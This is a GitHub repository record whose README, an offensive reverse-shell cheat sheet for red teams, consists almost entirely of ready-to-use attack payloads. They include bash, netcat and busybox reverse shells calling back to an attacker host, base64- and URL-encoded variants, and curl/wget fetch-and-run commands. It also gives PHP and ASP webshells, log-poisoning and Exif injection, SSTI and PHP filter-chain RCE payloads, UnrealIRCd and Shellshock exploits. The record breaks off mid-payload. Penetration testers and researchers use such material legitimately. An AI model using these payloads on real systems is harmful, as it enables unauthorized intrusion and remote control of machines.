{"id":10789916,"url":"https://github.com/d4t4s3c/OffensiveReverseShellCheatSheet","last_synced_at":"2025-09-15T18:31:16.915Z","repository":{"id":37244965,"uuid":"247482619","full_name":"d4t4s3c/OffensiveReverseShellCheatSheet","owner":"d4t4s3c","description":"Collection of reverse shells for red team operations.","archived":false,"fork":false,"pushed_at":"2024-12-09T07:03:32.000Z","size":10065,"stargazers_count":471,"open_issues_count":0,"forks_count":91,"subscribers_count":8,"default_branch":"master","last_synced_at":"2024-12-31T20:20:41.771Z","etag":null,"topics":["bash","cheat-sheet","cheatsheet","cybersecurity","netcat","oscp","penetration-testing","pentest","pentesting","perl","php","powershell","python","redteam","redteaming","reverse-shell","reverse-shells","ruby","xterm"],"latest_commit_sha":null,"homepage":"","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/d4t4s3c.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-03-15T14:29:15.000Z","updated_at":"2024-12-30T22:24:54.000Z","dependencies_parsed_at":"2022-07-11T05:45:56.902Z","dependency_job_id":"d5bd95a4-4617-4b57-a954-bb77bfdab612","html_url":"https://github.com/d4t4s3c/OffensiveReverseShellCheatSheet","commit_stats":null,"previous_names":["d4t4s3c/offensivereverseshellcheatsheet","d4t4s3c/offensive-reverse-shell-cheat-sheet"],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/d4t4s3c%2FOffensiveReverseShellCheatSheet","tags_url":"https://repos.ecosyste.ms/api
/v1/hosts/GitHub/repositories/d4t4s3c%2FOffensiveReverseShellCheatSheet/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/d4t4s3c%2FOffensiveReverseShellCheatSheet/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/d4t4s3c%2FOffensiveReverseShellCheatSheet/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/d4t4s3c","download_url":"https://codeload.github.com/d4t4s3c/OffensiveReverseShellCheatSheet/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":233140528,"owners_count":18631025,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bash","cheat-sheet","cheatsheet","cybersecurity","netcat","oscp","penetration-testing","pentest","pentesting","perl","php","powershell","python","redteam","redteaming","reverse-shell","reverse-shells","ruby","xterm"],"created_at":"2024-06-06T08:05:51.584Z","updated_at":"2025-09-15T18:31:16.895Z","avatar_url":"https://github.com/d4t4s3c.png","language":"PowerShell","funding_links":[],"categories":["cheatsheet"],"sub_categories":[],"readme":"# Offensive Reverse Shell (Cheat Sheet)\n\n![GitHub stars](https://img.shields.io/github/stars/d4t4s3c/OffensiveReverseShellCheatSheet?logoColor=yellow) ![GitHub forks](https://img.shields.io/github/forks/d4t4s3c/OffensiveReverseShellCheatSheet?logoColor=purple) ![GitHub watchers](https://img.shields.io/github/watchers/d4t4s3c/OffensiveReverseShellCheatSheet?logoColor=green)\u003c/br\u003e\n![GitHub commit activity 
(branch)](https://img.shields.io/github/commit-activity/m/d4t4s3c/OffensiveReverseShellCheatSheet) ![GitHub contributors](https://img.shields.io/github/contributors/d4t4s3c/OffensiveReverseShellCheatSheet)\n\nWelcome to the `Offensive Reverse Shell (Cheat Sheet)`, a comprehensive repository curated specifically for **Red Team Operations**, **Penetration Testing**, and **Security Research**. This repository contains a variety of **reverse shell** payloads crafted in different languages and configurations to suit diverse scenarios and environments.\n\n\u003e [!WARNING]\n\u003e All content in this repository is intended strictly for educational purposes and authorized security testing in controlled environments only, whether real or CTF.\n\n## Table of Contents\n\n- [Bash](#bash)\n- [Netcat](#netcat)\n  - [Netcat Linux](#netcat-linux)\n  - [Netcat Windows](#netcat-windows)\n- [cURL](#curl)\n- [Wget](#wget)\n- [Node-RED](#node-red)\n- [WebShells](#webshells)\n  - [Exif Data](#exif-data-webshell)\n  - [ASP WebShell](#asp-webshell)\n  - [PHP WebShell](#php-webShell)\n    - [GET](#get)\n    - [POST](#post)\n    - [Chain Filter](#chain-filter)\n    - [Log Poisoning WebShell](#log-poisoning-webshell)\n      - [SSH](#log-poisoning-ssh)\n      - [FTP](#log-poisoning-ftp)\n      - [HTTP](#log-poisoning-http)\n      - [RSYNC](#log-poisoning-rsync)\n- [Server Side Template Injection (SSTI)](#server-side-template-injection)\n- [UnrealIRCd](#unrealircd)\n- [Exif Data](#exif-data-reverse-shell)\n- [Shellshock](#shellshock)\n  - [SSH](#shellshock-ssh)\n  - [HTTP](#shellshock-http)\n    - [HTTP 500 Internal Server Error](#shellshock-http-500-internal-server-error)\n- [CMS](#cms)\n  - [WordPress](#wordpress)\n  - [October](#october)\n  - [Jenkins](#jenkins)\n    - [Windows](#jenkins-windows)\n    - [Linux](#jenkins-linux)\n- [Perl](#perl)\n- [Python](#python)\n- [Python3](#python3)\n- [PHP](#php)\n- [Ruby](#ruby)\n- 
[Xterm](#xterm)\n- [Ncat](#ncat)\n- [Socat](#socat)\n- [PowerShell](#powershell)\n- [Awk](#awk)\n- [Gawk](#gawk)\n- [Golang](#golang)\n- [Telnet](#telnet)\n- [Java](#java)\n- [Node](#node)\n- [Msfvenom](#msfvenom)\n  - [Web Payloads](#web-payloads)\n    - [PHP](#php-payload)\n    - [WAR (Tomcat)](#war-payload)\n    - [JAR](#jar-payload)\n    - [JSP](#jsp-payload)\n    - [ASPX](#aspx-payload)\n  - [Linux Payloads](#linux-payloads)\n    - [Listener Netcat](#linux-listener-netcat)\n    - [Listener Metasploit Multi Handler](#linux-listener-metasploit-multi-handler)\n  - [Windows Payloads](#windows-payloads)\n    - [Listener Netcat](#windows-listener-netcat)\n    - [Listener Metasploit Multi Handler](#windows-listener-metasploit-multi-handler)\n\n---\n\n# \u003ckbd\u003eBash\u003c/kbd\u003e\n\n\u003ckbd\u003eTCP\u003c/kbd\u003e\n\n\u003ckbd\u003e-i\u003c/kbd\u003e\n\n```sh\n#sh\nsh -i \u003e\u0026 /dev/tcp/192.168.1.2/443 0\u003e\u00261\n/bin/sh -i \u003e\u0026 /dev/tcp/192.168.1.2/443 0\u003e\u00261\n#bash\nbash -i \u003e\u0026 /dev/tcp/192.168.1.2/443 0\u003e\u00261\n/bin/bash -i \u003e\u0026 /dev/tcp/192.168.1.2/443 0\u003e\u00261\n```\n\n# \u003ckbd\u003e196\u003c/kbd\u003e\n\n```sh\n#sh\n0\u003c\u0026196;exec 196\u003c\u003e/dev/tcp/192.168.1.2/443; sh \u003c\u0026196 \u003e\u0026196 2\u003e\u0026196\n0\u003c\u0026196;exec 196\u003c\u003e/dev/tcp/192.168.1.2/443; /bin/sh \u003c\u0026196 \u003e\u0026196 2\u003e\u0026196\n#bash\n0\u003c\u0026196;exec 196\u003c\u003e/dev/tcp/192.168.1.2/443; bash \u003c\u0026196 \u003e\u0026196 2\u003e\u0026196\n0\u003c\u0026196;exec 196\u003c\u003e/dev/tcp/192.168.1.2/443; /bin/bash \u003c\u0026196 \u003e\u0026196 2\u003e\u0026196\n```\n\n# \u003ckbd\u003eread line\u003c/kbd\u003e\n\n```sh\nexec 5\u003c\u003e/dev/tcp/192.168.1.2/443;cat \u003c\u00265 | while read line; do $line 2\u003e\u00265 \u003e\u00265; done\n```\n\n# \u003ckbd\u003e5\u003c/kbd\u003e\n\n```sh\n#sh\nsh -i 5\u003c\u003e /dev/tcp/192.168.1.2/443 0\u003c\u00265 
1\u003e\u00265 2\u003e\u00265\n/bin/sh -i 5\u003c\u003e /dev/tcp/192.168.1.2/443 0\u003c\u00265 1\u003e\u00265 2\u003e\u00265\n#bash\nbash -i 5\u003c\u003e /dev/tcp/192.168.1.2/443 0\u003c\u00265 1\u003e\u00265 2\u003e\u00265\n/bin/bash -i 5\u003c\u003e /dev/tcp/192.168.1.2/443 0\u003c\u00265 1\u003e\u00265 2\u003e\u00265\n```\n\n# \u003ckbd\u003e-c\u003c/kbd\u003e\n\n```sh\nbash -c 'bash -i \u003e\u0026 /dev/tcp/192.168.1.2/443 0\u003e\u00261'\n#basic url encode\nbash -c 'bash -i \u003e%26 /dev/tcp/192.168.1.2/443 0\u003e%261'\n#full url encode\nbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.1.2%2F443%200%3E%261%27\n```\n\u003ckbd\u003eUDP\u003c/kbd\u003e\n\n```sh\n#sh\nsh -i \u003e\u0026 /dev/udp/192.168.1.2/443 0\u003e\u00261\n/bin/sh -i \u003e\u0026 /dev/udp/192.168.1.2/443 0\u003e\u00261\n#bash\nbash -i \u003e\u0026 /dev/udp/192.168.1.2/443 0\u003e\u00261\n/bin/bash -i \u003e\u0026 /dev/udp/192.168.1.2/443 0\u003e\u00261\n```\n\n---\n\n# \u003ckbd\u003eNetcat\u003c/kbd\u003e\n\n# \u003ckbd\u003eNetcat Linux\u003c/kbd\u003e\n\n\u003ckbd\u003e-e\u003c/kbd\u003e\n\n```sh\n#sh\nnc 192.168.1.2 443 -e sh\nnc 192.168.1.2 443 -e /bin/sh\n#bash\nnc 192.168.1.2 443 -e bash\nnc 192.168.1.2 443 -e /bin/bash\n```\n\n\u003ckbd\u003e-c\u003c/kbd\u003e\n\n```sh\n#sh\nnc -c sh 192.168.1.2 443\nnc -c /bin/sh 192.168.1.2 443\n#bash\nnc -c bash 192.168.1.2 443\nnc -c /bin/bash 192.168.1.2 443\n```\n\n\u003ckbd\u003eNO -e -c\u003c/kbd\u003e\n\n```sh\n#1) create FIFO pipe (pipeline)\nmknod /tmp/backpipe p\n#2) reverse shell\n/bin/sh 0\u003c/tmp/backpipe | nc 192.168.1.2 443 1\u003e/tmp/backpipe\n```\n\n# \u003ckbd\u003eBusyBox\u003c/kbd\u003e\n\n```sh\n#sh\nbusybox nc 192.168.1.2 443 -e sh\nbusybox nc 192.168.1.2 443 -e /bin/sh\n#bash\nbusybox nc 192.168.1.2 443 -e bash\nbusybox nc 192.168.1.2 443 -e /bin/bash\n#not 
space\nbusybox+nc+192.168.1.2+443+-e+sh\nbusybox${IFS}nc${IFS}192.168.1.2${IFS}443${IFS}-e${IFS}sh\n```\n\n\u003ckbd\u003efifo\u003c/kbd\u003e\n\n```sh\n#sh\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2\u003e\u00261|nc 192.168.1.2 443 \u003e/tmp/f\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2\u003e\u00261|nc 192.168.1.2 443 \u003e/tmp/f\n#bash\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2\u003e\u00261|nc 192.168.1.2 443 \u003e/tmp/f\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2\u003e\u00261|nc 192.168.1.2 443 \u003e/tmp/f\n#url encode\nrm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20192.168.1.2%20443%20%3E%2Ftmp%2Ff\n\n#base64\n#attacker\nbase64 -w 0 \u003c\u003c\u003c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2\u003e\u00261|nc 192.168.1.2 443 \u003e/tmp/f'\ncm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTkyLjE2OC4xLjIgNDQzID4vdG1wL2YK\nnc -lvnp 443\n#victim\necho 'cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTkyLjE2OC4xLjIgNDQzID4vdG1wL2YK' |base64 -d |sh\n#or\nhttp://192.168.1.3/cmd.php?cmd=echo 'cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTkyLjE2OC4xLjIgNDQzID4vdG1wL2YK' |base64 -d |sh\n```\n\n---\n\n# \u003ckbd\u003eNetcat Windows\u003c/kbd\u003e\n\n```sh\nnc.exe -e cmd 192.168.1.2 443\n#smbserver\ncp $(locate nc.exe) . 
\u0026\u0026 impacket-smbserver a $(pwd) -smb2support\n\\\\192.168.1.2\\a\\nc.exe -e cmd 192.168.1.2 443\n```\n\n---\n\n# \u003ckbd\u003ecURL\u003c/kbd\u003e\n\n```sh\n#attacker\necho \"nc -e /bin/sh 192.168.1.2 443\" \u003e index.html \u0026\u0026 python3 -m http.server 80\nnc -lvnp 443\n#victim\nhttp://192.168.1.3/cmd.php?cmd=curl 192.168.1.2/index.html|sh\n```\n\n---\n\n# \u003ckbd\u003eWget\u003c/kbd\u003e\n\n```sh\n#attacker\necho \"nc -e /bin/sh 192.168.1.2 443\" \u003e index.html \u0026\u0026 python3 -m http.server 80\nnc -lvnp 443\n#victim\nhttp://192.168.1.3/cmd.php?cmd=wget -qO- 192.168.1.2/index.html|sh\n```\n\n---\n\n# \u003ckbd\u003eNode-RED\u003c/kbd\u003e\n\n```json\n[{\"id\":\"7235b2e6.4cdb9c\",\"type\":\"tab\",\"label\":\"Flow 1\"},{\"id\":\"d03f1ac0.886c28\",\"type\":\"tcp out\",\"z\":\"7235b2e6.4cdb9c\",\"host\":\"\",\"port\":\"\",\"beserver\":\"reply\",\"base64\":false,\"end\":false,\"name\":\"\",\"x\":786,\"y\":350,\"wires\":[]},{\"id\":\"c14a4b00.271d28\",\"type\":\"tcp in\",\"z\":\"7235b2e6.4cdb9c\",\"name\":\"\",\"server\":\"client\",\"host\":\"192.168.1.2\",\"port\":\"443\",\"datamode\":\"stream\",\"datatype\":\"buffer\",\"newline\":\"\",\"topic\":\"\",\"base64\":false,\"x\":281,\"y\":337,\"wires\":[[\"4750d7cd.3c6e88\"]]},{\"id\":\"4750d7cd.3c6e88\",\"type\":\"exec\",\"z\":\"7235b2e6.4cdb9c\",\"command\":\"\",\"addpay\":true,\"append\":\"\",\"useSpawn\":\"false\",\"timer\":\"\",\"oldrc\":false,\"name\":\"\",\"x\":517,\"y\":362.5,\"wires\":[[\"d03f1ac0.886c28\"],[\"d03f1ac0.886c28\"],[\"d03f1ac0.886c28\"]]}]\n```\n\n---\n\n# \u003ckbd\u003eWebShells\u003c/kbd\u003e\n\n# \u003ckbd\u003eExif Data WebShell\u003c/kbd\u003e\n\n```sh\nexiftool -Comment='\u003c?php system($_GET['cmd']); ?\u003e' filename.png\nmv filename.png filename.php.png\n```\n\n# \u003ckbd\u003eASP WebShell\u003c/kbd\u003e\n\n```asp\n\u003c%response.write CreateObject(\"WScript.Shell\").Exec(Request.QueryString(\"cmd\")).StdOut.Readall()%\u003e\n```\n\n# 
\u003ckbd\u003ePHP WebShell\u003c/kbd\u003e\n\n# \u003ckbd\u003eChain Filter\u003c/kbd\u003e\n\n**http://192.168.1.2/file.php?file=\"paste chain filter\"**\n\n```php\nphp://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM
1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64
-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161
.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp\u0026cmd=id\n```\n\n# \u003ckbd\u003eGET\u003c/kbd\u003e\n\n```php\n\u003c?=`$_GET[cmd]`?\u003e\n\u003c?php system($_GET['cmd']); ?\u003e\nGIF89a; \u003c?php system($_GET['cmd']); ?\u003e\n\u003c?php passthru($_GET['cmd']); ?\u003e\n\u003c?php echo exec($_GET['cmd']); ?\u003e\n\u003c?php system($_REQUEST['cmd']); ?\u003e\n\u003c?php echo shell_exec($_GET['cmd']); ?\u003e\n\u003cpre\u003e\u003c?php system($_GET['cmd']); ?\u003e\u003c/pre\u003e\n\u003cpre\u003e\u003ch1\u003e\u003c?php system($_GET['cmd']); ?\u003e\u003c/h1\u003e\u003c/pre\u003e\n\u003c?php echo \"\u003cpre\u003e\" . shell_exec($_REQUEST['cmd']) . \"\u003c/pre\u003e\"; ?\u003e\n```\n\n# \u003ckbd\u003ePOST\u003c/kbd\u003e\n\n```php\n\u003c?php system($_POST['cmd']); ?\u003e\n```\n\n---\n\n# \u003ckbd\u003eLog Poisoning WebShell\u003c/kbd\u003e\n\n# \u003ckbd\u003eLog Poisoning SSH\u003c/kbd\u003e\n\n/var/log/auth.log\n\n```php\nssh '\u003c?php system($_GET[\"cmd\"]); ?\u003e'@192.168.1.2\n```\n\nfile.php?file=`/var/log/auth.log\u0026cmd=id`\n\n---\n\n# \u003ckbd\u003eLog Poisoning FTP\u003c/kbd\u003e\n\n/var/log/vsftpd.log\n\n```cmd\nlftp -u '\u003c?php system($_GET[\"cmd\"]); ?\u003e', 192.168.1.2\n```\n\nfile.php?file=`/var/log/vsftpd.log\u0026cmd=id`\n\n---\n\n# \u003ckbd\u003eLog Poisoning HTTP\u003c/kbd\u003e\n\nApache2: `/var/log/apache2/access.log`  \nNginx: `/var/log/nginx/access.log`\n\n```cmd\ncurl -s -H \"User-Agent: \u003c?php system(\\$_GET['cmd']); ?\u003e\" \"http://192.168.1.2\"\n```\n\n```cmd\nUser-Agent: \u003c?php system($_GET['cmd']); ?\u003e\n```\n\nApache2: file.php?file=`/var/log/apache2/access.log\u0026cmd=id`\nNginx: file.php?file=`/var/log/nginx/access.log\u0026cmd=id`\n\n---\n\n\n# \u003ckbd\u003eLog Poisoning RSYNC\u003c/kbd\u003e\n\n/var/log/rsyncd.log\n\n```cmd\nrsync 192.168.1.2::'\u003c?php 
system($_GET[\"cmd\"]); ?\u003e'\n```\n\nfile.php?file=`/var/log/rsyncd.log\u0026cmd=id`\n\n---\n\n# \u003ckbd\u003eServer Side Template Injection\u003c/kbd\u003e\n\n```python\n{{request.application.__globals__.__builtins__.__import__('os').popen('nc -e /bin/sh 192.168.1.2 443').read()}}\n```\n```python\n{{''.__class__.__mro__[1].__subclasses__()[373](\"bash -c 'bash -i \u003e\u0026 /dev/tcp/192.168.1.2/443 0\u003e\u00261'\",shell=True,stdout=-1).communicate()[0].strip()}}\n```\n```python\n{% for x in ().__class__.__base__.__subclasses__() %}{% if \"warning\" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(\"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"192.168.1.2\\\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/bash\\\", \\\"-i\\\"]);'\").read().zfill(417)}}{%endif%}{% endfor %}\n```\n```python\n{% import os %}{{os.system('bash -c \"bash -i \u003e\u0026 /dev/tcp/192.168.1.2/443 0\u003e\u00261\"')}}\n```\n```python\n%7B%25%20import%20os%20%25%7D%7B%7Bos.system%28%27bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.1.2%2F443%200%3E%261%22%27%29%7D%7D\n```\n\n---\n\n# \u003ckbd\u003eUnrealIRCd\u003c/kbd\u003e\n\n```cmd\nroot@kali:~# echo \"AB;nc -e /bin/sh 192.168.1.2 443\" |nc 192.168.1.3 6697\n```\n\n---\n\n# \u003ckbd\u003eExif Data Reverse Shell\u003c/kbd\u003e\n\n```cmd\nroot@kali:~# exiftool -Comment='\u003c?php system(\"nc -e /bin/bash 192.168.1.2 443\"); ?\u003e' filename.png\nroot@kali:~# mv filename.png filename.php.png\n```\n\n---\n\n# \u003ckbd\u003eShellshock\u003c/kbd\u003e\n\n# \u003ckbd\u003eShellshock SSH\u003c/kbd\u003e\n\n```sh\nssh user@192.168.1.3 '() { :;}; nc 192.168.1.2 443 -e /bin/bash'\nssh user@192.168.1.3 -i id_rsa '() { :;}; nc 192.168.1.2 443 -e /bin/bash'\n```\n\n---\n\n# \u003ckbd\u003eShellshock HTTP\u003c/kbd\u003e\n\n```sh\ncurl -H 'Cookie: () { :;}; /bin/bash -i \u003e\u0026 
/dev/tcp/192.168.1.2/443 0\u003e\u00261' http://192.168.1.3/cgi-bin/test.sh\n```\n```sh\ncurl -H \"User-Agent: () { :; }; /bin/bash -c 'bash -i \u003e\u0026 /dev/tcp/192.168.1.2/443 0\u003e\u00261'\" \"http://192.168.1.3/cgi-bin/evil.sh\"\n```\n```sh\ncurl -H \"User-Agent: () { :; }; /bin/bash -c 'bash -i \u003e\u0026 /dev/tcp/192.168.1.2/443 0\u003e\u00261'\" \"http://192.168.1.3/cgi-bin/evil.cgi\"\n```\n\n---\n\n# \u003ckbd\u003eShellshock HTTP 500 Internal Server Error\u003c/kbd\u003e\n\n```sh\ncurl -H \"User-Agent: () { :; }; echo; /bin/bash -c 'bash -i \u003e\u0026 /dev/tcp/192.168.1.2/443 0\u003e\u00261'\" \"http://192.168.1.3/cgi-bin/evil.sh\"\ncurl -H \"User-Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i \u003e\u0026 /dev/tcp/192.168.1.2/443 0\u003e\u00261'\" \"http://192.168.1.3/cgi-bin/evil.sh\"\ncurl -H \"User-Agent: () { :; }; echo; /bin/bash -c 'bash -i \u003e\u0026 /dev/tcp/192.168.1.2/443 0\u003e\u00261'\" \"http://192.168.1.3/cgi-bin/evil.cgi\"\ncurl -H \"User-Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i \u003e\u0026 /dev/tcp/192.168.1.2/443 0\u003e\u00261'\" \"http://192.168.1.3/cgi-bin/evil.cgi\"\n```\n\n---\n\n# \u003ckbd\u003eCMS\u003c/kbd\u003e\n\n# \u003ckbd\u003eWordPress\u003c/kbd\u003e\n\n\u003ckbd\u003eCreate Plugin (Reverse Shell)\u003c/kbd\u003e\n\n```cmd\ntouch plugin.php\nnano plugin.php\n```\n\n\u003ckbd\u003eContent\u003c/kbd\u003e\n\n```php\n\u003c?php\n  /**\n  * Plugin Name: WordPress (Reverse Shell)\n  * Plugin URI: https://wordpress.org\n  * Description: (Pwn3d!)\n  * Version: 1.0\n  * Author: d4t4s3c\n  * Author URI: https://github.com/d4t4s3c\n  */\n  exec(\"busybox nc 192.168.1.2 443 -e 